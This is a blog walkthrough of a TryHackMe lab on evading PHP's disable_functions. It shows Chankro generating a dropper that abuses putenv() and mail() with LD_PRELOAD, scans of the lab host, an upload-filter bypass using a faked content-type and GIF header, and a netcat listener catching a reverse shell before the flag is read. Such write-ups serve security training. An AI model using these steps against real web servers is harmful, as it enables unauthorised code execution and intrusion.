Bypass Disable Functions
Practice bypassing disabled dangerous features that run operating system
commands or start processes.
This vulnerability occurs in web applications where there is the possibility
of uploading a file without being checked by a security system that curbs
potential dangers.
It allows an attacker to upload files with code
(scripts such as .php, .aspx and more) and run them on the same
server, more information in this room.
Among the typically applied
measures is disabling dangerous functions that could execute operating system
commands or start processes. Functions such as system() or
shell_exec() are often disabled through PHP directives defined
in the php.ini configuration file. Other functions, perhaps less
known as dl() (which allows you to load a
PHP extension dynamically), can go unnoticed by the system administrator and not be disabled. The
usual thing in an intrusion test is to list which functions are enabled in
case any have been forgotten.
One of the easiest techniques to
implement and not very widespread is to abuse the mail() and putenv()
functionalities. This technique is not new, it was already reported to
PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function, we can
modify the environment variables, allowing us to assign the value we want to
the variable LD_PRELOAD. Roughly LD_PRELOAD will allow us to pre-load a .so library before the rest
of the libraries, so that if a program uses a function of a library (libc.so
for example), it will execute the one in our library instead of the one it
should. In this way, we can hijack or "hook" functions, modifying their
behaviour at will.
Chankro: tool to evade disable_functions and open_basedir
Through
Chankro, we generate a PHP script that will act as a dropper, creating on the
server a .so library and the binary (a meterpreter, for example) or bash
script (reverse shell, for example) that we want to execute freely, and that
will later call putenv() and mail() to launch the
process.
Install tool:
git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help
python chankro.py --arch 64 --input c.sh --output tryhackme.php --path
/var/www/html
--arch = Architecture of system victim 32 o 64.
--input
= file with your payload to execute
--output = Name of the PHP
file you are going to create; this is the file you will need to upload.
--path
= It is necessary to specify the absolute path where our uploaded PHP file is
located. For example, if our file is located in the uploads folder
DOCUMENTROOT + uploads.
Now, when executing the PHP script in the web server, the necessary files will
be created to execute our payload.
My command run successfully, and I created a file in the directory with the
output of the command.
First of all we will start machine of tryhackme room bypass disable function and after search room's IP what do we see there!! there is upload page where we can upload a any image and execution file via Burp Suite because we have to upload by bypassing the PHP file.
and after uploading malicious file we have to check in which directory the
file is uploaded? so for this we will use gobuster for find a directory.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro] └─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.61.162/ [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2021/09/16 12:23:04 Starting gobuster in directory enumeration mode =============================================================== /uploads (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/] /assets (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/] /cv.php (Status: 200) [Size: 4153] Progress: 98580 / 441122 (22.35%)
if you want to check which port is open in this site then you can do this with NMAP or RUSTSCAN.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro] └─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt 1 ⨯ [~] Automatically increasing ulimit value to 5000. Open 10.10.61.162:22 Open 10.10.61.162:80 [~] Starting Nmap [>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 0.00s elapsed Initiating Ping Scan at 12:17 Scanning 10.10.61.162 [2 ports] Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 12:17 Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 12:17 Scanning 10.10.61.162 [2 ports] Discovered open port 22/tcp on 10.10.61.162 Discovered open port 80/tcp on 10.10.61.162 Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports) Initiating Service scan at 12:17 Scanning 2 services on 10.10.61.162 Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host) NSE: Script scanning 10.10.61.162. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 9.83s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 1.21s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 0.00s elapsed Nmap scan report for 10.10.61.162 Host is up, received syn-ack (0.24s latency). Scanned at 2021-09-16 12:17:30 IST for 18s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT | 256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ= | 256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Ecorp - Jobs Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 12:17 Completed NSE at 12:17, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro] └─$
We got a file uploaded directory /uploads
when listing the web with the tool wappalyzer you can see that the web has as a programming language PHP
With this in we can see that the file mind phpinfo.php is
available, this file gives us information about the server configuration
and the settings to interpret a php for example.
Looking at the information that gives us, phpinfo we can see a section called disable_funtions and in it many critical variables are set, such as:
exec
passthru
shell_exec
system
proc_open
popen
curl_exec
curl_multi_exec
As we can see that we are very limited when it comes
to uploading a file php which contains malicious code for our benefit but
investigating and thanks to the information provided by this machine we can
make use of the tool Chankro .
This tool allows us to execute
commands through the mail () and putenv () functions by changing an
environment variable with which it executes the binary sendmail . An
explanation of what it does is at a low level explained in this article .
To
test if the tool works we are going to execute a whoami and deposit it in the
absolute path of the web, which is hosted in
/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/ this is known
since in phpinfo you can see the path in where the web is hosted.
I will use the tool Chankro with the following paramters but before we create a c.sh file
sudo nano c.sh
python chankro.py --arch 64 --input c.sh --output tryhackme.php --path
/var/www/html
--arch = Architecture of system victim 32 o 64.
--input
= file with your payload to execute
--output = Name of the PHP
file you are going to create; this is the file you will need to upload.
--path
= It is necessary to specify the absolute path where our uploaded PHP file is
located. For example, if our file is located in the uploads folder
DOCUMENTROOT + uploads.
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro] └─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads -=[ Chankro ]=- -={ @TheXC3LL }=- [+] Binary file: c.sh [+] Architecture: x64 [+] Final PHP: hackingtruth-exploit.php [+] File created! ┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro] └─$
once the malicious file is created, it creates the file for us, i will php go to the web and upload it.
and file uploading time we intercept the request and
changed the content-type (image/jpeg) and write a GIF87a
What is GIF87a?
GIF87a is the original format for indexed color images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animationcapabilities.
check a file uploaded or not in /uploads directory
Gaining Access
Now that we can see that commands can be executed at the system level, I will
modify the file command.sh and add code that when it is executed I will start
a revershell to my machine on port 443:
With this in mind and
already modified the file command.sh I recreate the file winsad.php with
Chankro and once created I add the header 'GIF89a;' and upload the file.
Since
I went back up the php and going to the path where is hosted winsad.php I can
see that the code interprets me and gives me the shell :
Start a netcat listener and click on that uploaded file-
nc -nvlp 4444
Once inside the machine we can go to the user's directory s4vi and view the
flag.
www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home <ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home www-data@ubuntu:/home$ ls -la ls -la total 12 drwxr-xr-x 3 root root 4096 Jun 22 08:12 . drwxr-xr-x 22 root root 4096 Jun 23 18:59 .. drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 s4vi www-data@ubuntu:/home$ cd s4vi cd s4vi www-data@ubuntu:/home/s4vi$ ls -la www-data@ubuntu:/home/s4vi$ ls -la total 44 drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 . drwxr-xr-x 3 root root 4096 Jun 22 08:12 .. -rw------- 1 root root 6127 Jun 23 23:49 .bash_history -rw-r--r-- 1 s4vi s4vi 220 Jun 22 08:12 .bash_logout -rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano -rw-r--r-- 1 s4vi s4vi 655 Jun 22 08:12 .profile -rw-r--r-- 1 s4vi s4vi 0 Jun 23 17:59 .sudo_as_admin_successful -rw-r--r-- 1 root root 183 Jun 23 23:29 .wget-hsts -rw-rw-r-- 1 s4vi s4vi 37 Jun 23 23:34 flag.txt www-data@ubuntu:/home/s4vi$ www-data@ubuntu:/home/s4vi$ cat flag.txt cat cat flag.txt cat: cat: No such file or directory thm{bypass_d1sable_functions_1n_php} www-data@ubuntu:/home/s4vi$
We got it!!!
Disclaimer
All tutorials are for informational and educational purposes only and have been
made using our own routers, servers, websites and other vulnerable free
resources. we do not contain any illegal activity. We believe that ethical
hacking, information security and cyber security should be familiar subjects to
anyone using digital information and computers.
Hacking Truth is
against misuse of the information and we strongly suggest against it. Please
regard the word hacking as ethical hacking or penetration testing every time
this word is used. We do not promote, encourage, support or excite any illegal
activity or hacking.
- Hacking Truth by Kumar Atul
Jaiswal
0 comments:
Post a Comment
For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.